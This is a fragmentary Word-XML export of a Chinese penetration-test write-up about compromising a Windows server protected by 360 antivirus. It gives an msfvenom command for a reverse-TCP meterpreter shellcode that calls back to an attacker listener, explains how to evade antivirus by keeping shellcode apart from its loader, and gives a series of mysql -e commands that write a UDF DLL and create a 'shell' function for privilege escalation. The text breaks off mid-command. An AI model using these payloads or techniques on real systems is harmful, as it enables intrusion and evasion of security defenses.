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一次普通的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>项目，做完后，却陈思很久，遂打算一气合成把整个流程记录下来，此篇再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一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的叮嘱我：分享便是我最好的老师。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de3f29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opoor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拿shell过程略过。（由于文章在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项目实施结束形成，故部分无图或补图）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de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机背景：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25" w:firstLine="483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2008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r2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x64位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360主动+360卫士+360杀毒+waf，目标机仅支持aspx。运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行OAWeb服务（.net+mssql），并且是内网中其他服务器的数据库服务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器（mysql数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>库，不支持php，无.net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mysql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驱动）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53.600pt;height:490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端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>口开放如下：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42.600pt;height:327.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:499.800pt;width:254.400pt;height:246.600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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要解决的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第一个问题：payload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由于目标机，安装某套装，payload一定是必须要解决的问题。当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tasklist的时候，看到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如下图几个进程的时候，第一反应就是需要做payloa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d分离免杀。分离免杀主要分两大类，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一类为第三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方分离免杀，一类为自带安装分离免杀。文章中，采取了第三方分离免杀。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本地补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>图（由于项目在实施后形成该文章，故本地靶机补图）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587.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11757" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:11757;width:82;height:622" coordorigin="1177,11757" coordsize="82,622" path="m1217,11760l1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11760,1217,11761,1217,11761,1217,11761,1217,11761,1217,11761,1217,11762,1217,11762,1217,11762,1217,11763,1217,11763,1217,11764,1217,11764,1217,11765,1217,11765,1217,11766,1217,11767,1217,11768,1217,11769,1217,11770,1217,11771,1217,11772,1217,11773,1217,11774,1217,11775,1217,11777,1217,11778,1217,11779,1217,11781,1217,11783,1217,11784,1217,11786,1217,11788,1217,11790,1217,11792,1217,11795,1217,11797,1217,11799,1217,11802,1217,11804,1217,11807,1217,11810,1217,11813,1217,11816,1217,11819,1217,11822,1217,11826,1217,11829,1217,11833,1217,11837,1217,11841,1217,11845,1217,11849,1217,11853,1217,11858,1217,11862,1217,11867,1217,11872,1217,11877,1217,11882,1217,11887,1217,11893,1217,11899,1217,11904,1217,11910,1217,11916,1217,11923,1217,11929,1217,11936,1217,11942,1217,11949,1217,11956,1217,11964,1217,11971,1217,11979,1217,11987,1217,11995,1217,12003,1217,12011,1217,12020,1217,12028,1217,12037,1217,12046,1217,12056,1217,12065,1217,12075,1217,12085,1217,12095,1217,12106,1217,12116,1217,12127,1217,12138,1217,12149,1217,12161,1217,12172,1217,12184,1217,12196,1217,12209,1217,12221,1217,12234,1217,12247,1217,12260,1217,12274,1217,12288,1217,12302,1217,12316,1217,12330,1217,12345,1217,12360e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:195.600pt;width:467.400pt;height:330.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:638.400pt;width:467.400pt;height:90.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313" w:firstLine="60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目前的反病</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查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杀。云查杀的特点基本也可以概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括为特征查杀。无论是哪种，都是特别针对PE头文件的查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杀。尤其是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当payload文件越大的时候，特征越容易查杀。</w:t>
      </w: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既然知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了目前的主流查杀方式，那么反制查杀，此篇采取特征与行为分离免杀。避免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PE头文件，并且分离行为，与特征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的综合免杀。适用于菜刀下等场景，也是我在基于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windows下为了更稳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定的一种常用手法。载入内存。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0x00:以msf为例：监听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端口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0x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001：这里的payload不采取生成pe文件，而采取shellcode方式，来借助第三方直接加载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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内存中。避免行为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1886" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom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-p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windows/x64/meterpreter/reverse_tcp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lhost=192.168.1.5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lport=8080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-i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5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-f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raw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&gt;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test.c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0x002:既然是shellcode方式的payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad，那么需要借助第三方来启动，加载到内存。执行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shellcode，自己写也不是很难，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这里我借用一个github一个开源：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32.600pt;width:467.400pt;height:63.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:257.399pt;width:388.800pt;height:378.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-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ttps://github.com/clinicallyinane/shellcode_launcher/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作者的话：建议大家自己写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode执行盒，相关代码网上非常成熟。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生成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的payload大小如下：476字节。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世</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>界杀毒网：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34.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:443.400pt;width:467.400pt;height:75.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:641.400pt;width:268.800pt;height:57.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9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线成功。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28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而关于自带安装分离免杀，请参考我在公司Wiki上写的第六十九课时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋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payload分离免杀思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路</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二季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payload反弹到vps的msf上，我的权限仅仅如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需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解决的第二个问题：提权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参考主机背景图，184个补丁，以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及某套装。遂放弃了exp提权。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58.200pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:79.200pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:100.200pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:447.0pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:89.400pt;margin-top:468.0pt;width:7.800pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:258.600pt;width:399.600pt;height:139.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:648.600pt;width:460.800pt;height:72.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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原因1：需要更多的时间消耗在对反病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软件对抗。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原因2：目标机补丁过多。需要消耗更</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>多的时间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原因3：非常艰难的环境下，拿到了权限，不想因为某些ex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p导致蓝屏从而丢失权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限。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开始翻阅目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机上的文件，以及搜集目标机的端口，服务，启动等一系列信息。发现目标机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安装mysql，并与内网其中一台建立大量连接。mysql版本为5.1.49-commu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nity-log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载目标机*..MYI，*.MYD，*.frm，加载于本地mysql。得到目标机root密码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而目标机没有相关脚本环境连接mysql，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到这里，可以有2个方向针对该问题作出解决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一：转发目标机端口到本地，从而操作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mysql。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二：在非交互式下，完成mysql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udf的提权。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为了减少目标主机的流量探测，以及维护来之不易的ses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sion，故选择了第二种方案。非交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互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式下，mysql提权。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23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命令行下，调用mysql是需要在启动一个mysql窗口，从而继续执行，而ses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sion下没有这样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的条件。但mysql的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-e参数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作为直接执行sql语句，从而不另启动窗口。而-e需要注意的事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项，use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋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database。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也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所有参数需要mysql.xxxx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如没有指定databas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e，将会出现如下错误，而使用UNION，将不会有回显，一定出现问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题，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会很难定位，故选择以mysql.x的方式指定。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179.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3597" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3597;width:82;height:322" coordorigin="1177,3597" coordsize="82,322" path="m1217,3611l1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3611,1217,3612,1217,3612,1217,3612,1217,3612,1217,3612,1217,3612,1217,3613,1217,3613,1217,3613,1217,3614,1217,3614,1217,3614,1217,3615,1217,3615,1217,3616,1217,3616,1217,3617,1217,3617,1217,3618,1217,3618,1217,3619,1217,3620,1217,3621,1217,3621,1217,3622,1217,3623,1217,3624,1217,3625,1217,3626,1217,3627,1217,3628,1217,3629,1217,3631,1217,3632,1217,3633,1217,3634,1217,3636,1217,3637,1217,3639,1217,3640,1217,3642,1217,3644,1217,3646,1217,3647,1217,3649,1217,3651,1217,3653,1217,3655,1217,3657,1217,3660,1217,3662,1217,3664,1217,3667,1217,3669,1217,3672,1217,3675,1217,3677,1217,3680,1217,3683,1217,3686,1217,3689,1217,3692,1217,3695,1217,3699,1217,3702,1217,3705,1217,3709,1217,3713,1217,3716,1217,3720,1217,3724,1217,3728,1217,3732,1217,3736,1217,3741,1217,3745,1217,3750,1217,3754,1217,3759,1217,3764,1217,3768,1217,3773,1217,3778,1217,3784,1217,3789,1217,3794,1217,3800,1217,3805,1217,3811,1217,3817,1217,3823,1217,3829,1217,3835,1217,3841,1217,3848,1217,3854,1217,3861,1217,3868,1217,3875,1217,3882,1217,3889,1217,3896,1217,3903,1217,3911e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:194.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3897" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:3897;width:82;height:622" coordorigin="1177,3897" coordsize="82,622" path="m1217,3911l1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3911,1217,3912,1217,3912,1217,3912,1217,3912,1217,3912,1217,3913,1217,3913,1217,3913,1217,3914,1217,3914,1217,3915,1217,3915,1217,3916,1217,3917,1217,3917,1217,3918,1217,3919,1217,3920,1217,3921,1217,3922,1217,3923,1217,3924,1217,3925,1217,3926,1217,3928,1217,3929,1217,3931,1217,3932,1217,3934,1217,3936,1217,3937,1217,3939,1217,3941,1217,3943,1217,3946,1217,3948,1217,3950,1217,3953,1217,3955,1217,3958,1217,3961,1217,3964,1217,3967,1217,3970,1217,3974,1217,3977,1217,3980,1217,3984,1217,3988,1217,3992,1217,3996,1217,4000,1217,4004,1217,4009,1217,4013,1217,4018,1217,4023,1217,4028,1217,4033,1217,4038,1217,4044,1217,4050,1217,4055,1217,4061,1217,4067,1217,4074,1217,4080,1217,4087,1217,4093,1217,4100,1217,4107,1217,4115,1217,4122,1217,4130,1217,4138,1217,4146,1217,4154,1217,4162,1217,4171,1217,4179,1217,4188,1217,4197,1217,4207,1217,4216,1217,4226,1217,4236,1217,4246,1217,4257,1217,4267,1217,4278,1217,4289,1217,4300,1217,4312,1217,4323,1217,4335,1217,4347,1217,4360,1217,4372,1217,4385,1217,4398,1217,4411,1217,4425,1217,4439,1217,4453,1217,4467,1217,4482,1217,4496,1217,4511e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:224.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,4497" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:4497;width:82;height:622" coordorigin="1177,4497" coordsize="82,622" path="m1217,4511l1217,4511,1217,4511,1217,4511,1217,4511,1217,4511,1217,4511,1217,4511,1217,4511,1217,4511,1217,4512,1217,4512,1217,4512,1217,4512,1217,4512,1217,4512,1217,4512,1217,4513,1217,4513,1217,4513,1217,4514,1217,4514,1217,4515,1217,4515,1217,4516,1217,4516,1217,4517,1217,4518,1217,4518,1217,4519,1217,4520,1217,4521,1217,4522,1217,4523,1217,4524,1217,4525,1217,4527,1217,4528,1217,4529,1217,4531,1217,4532,1217,4534,1217,4536,1217,4538,1217,4540,1217,4542,1217,4544,1217,4546,1217,4548,1217,4551,1217,4553,1217,4556,1217,4559,1217,4561,1217,4564,1217,4567,1217,4571,1217,4574,1217,4577,1217,4581,1217,4584,1217,4588,1217,4592,1217,4596,1217,4600,1217,4605,1217,4609,1217,4614,1217,4618,1217,4623,1217,4628,1217,4633,1217,4639,1217,4644,1217,4650,1217,4656,1217,4662,1217,4668,1217,4674,1217,4680,1217,4687,1217,4694,1217,4701,1217,4708,1217,4715,1217,4722,1217,4730,1217,4738,1217,4746,1217,4754,1217,4762,1217,4771,1217,4780,1217,4789,1217,4798,1217,4807,1217,4817,1217,4826,1217,4836,1217,4847,1217,4857,1217,4867,1217,4878,1217,4889,1217,4901,1217,4912,1217,4924,1217,4936,1217,4948,1217,4960,1217,4973,1217,4985,1217,4998,1217,5012,1217,5025,1217,5039,1217,5053,1217,5067,1217,5082,1217,5097,1217,5112e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:254.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5097;width:82;height:322" coordorigin="1177,5097" coordsize="82,322" path="m1217,5112l1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5112,1217,5113,1217,5113,1217,5113,1217,5113,1217,5113,1217,5114,1217,5114,1217,5114,1217,5115,1217,5115,1217,5115,1217,5116,1217,5116,1217,5117,1217,5117,1217,5118,1217,5119,1217,5119,1217,5120,1217,5121,1217,5121,1217,5122,1217,5123,1217,5124,1217,5125,1217,5126,1217,5127,1217,5128,1217,5129,1217,5130,1217,5131,1217,5133,1217,5134,1217,5135,1217,5137,1217,5138,1217,5140,1217,5141,1217,5143,1217,5145,1217,5146,1217,5148,1217,5150,1217,5152,1217,5154,1217,5156,1217,5158,1217,5160,1217,5163,1217,5165,1217,5168,1217,5170,1217,5173,1217,5175,1217,5178,1217,5181,1217,5184,1217,5187,1217,5190,1217,5193,1217,5196,1217,5199,1217,5203,1217,5206,1217,5210,1217,5213,1217,5217,1217,5221,1217,5225,1217,5229,1217,5233,1217,5237,1217,5241,1217,5246,1217,5250,1217,5255,1217,5260,1217,5264,1217,5269,1217,5274,1217,5279,1217,5284,1217,5290,1217,5295,1217,5301,1217,5306,1217,5312,1217,5318,1217,5324,1217,5330,1217,5336,1217,5342,1217,5349,1217,5355,1217,5362,1217,5369,1217,5375,1217,5382,1217,5390,1217,5397,1217,5404,1217,5412e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:269.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5397;width:82;height:322" coordorigin="1177,5397" coordsize="82,322" path="m1217,5412l1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5412,1217,5413,1217,5413,1217,5413,1217,5413,1217,5413,1217,5414,1217,5414,1217,5414,1217,5414,1217,5415,1217,5415,1217,5416,1217,5416,1217,5417,1217,5417,1217,5418,1217,5418,1217,5419,1217,5419,1217,5420,1217,5421,1217,5421,1217,5422,1217,5423,1217,5424,1217,5425,1217,5426,1217,5427,1217,5428,1217,5429,1217,5430,1217,5431,1217,5433,1217,5434,1217,5435,1217,5437,1217,5438,1217,5440,1217,5441,1217,5443,1217,5445,1217,5446,1217,5448,1217,5450,1217,5452,1217,5454,1217,5456,1217,5458,1217,5461,1217,5463,1217,5465,1217,5468,1217,5470,1217,5473,1217,5475,1217,5478,1217,5481,1217,5484,1217,5487,1217,5490,1217,5493,1217,5496,1217,5500,1217,5503,1217,5506,1217,5510,1217,5514,1217,5517,1217,5521,1217,5525,1217,5529,1217,5533,1217,5537,1217,5542,1217,5546,1217,5550,1217,5555,1217,5560,1217,5564,1217,5569,1217,5574,1217,5579,1217,5585,1217,5590,1217,5595,1217,5601,1217,5606,1217,5612,1217,5618,1217,5624,1217,5630,1217,5636,1217,5642,1217,5649,1217,5655,1217,5662,1217,5669,1217,5676,1217,5683,1217,5690,1217,5697,1217,5704,1217,5712e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:69.599pt;width:467.400pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId24" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:305.399pt;width:467.400pt;height:57.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>致流程如下：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spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="3489" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql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-uroot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-pXXXXXX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"create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table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mysql.a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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(cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="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LONGBLOB);"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mysql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-uroot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-pXXXXXX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"insert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into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mysql.a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(cmd)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values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(hex(load_file('D:\\XXXXXXX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XXX\\mysql5\\lib\\plugin\\u.dll')));"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2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mysql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-uroot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> 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-pXXXXXX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12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10"/>
        </w:rPr>
        <w:t> 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"SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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unhex(cmd)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FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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mysql.a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INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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DUMPFILE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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'D:/X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XXXXXXXXX/mysql5/lib/plugin/uu.dll';"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1373" w:firstLine="0"/>
      </w:pP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mysql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-uroot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-pXXXXXX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"CREATE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FUNCTION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shell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RETURNS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STRING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SONAME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'uu.dll'"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mysql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-uroot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-pXXXXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-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"select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
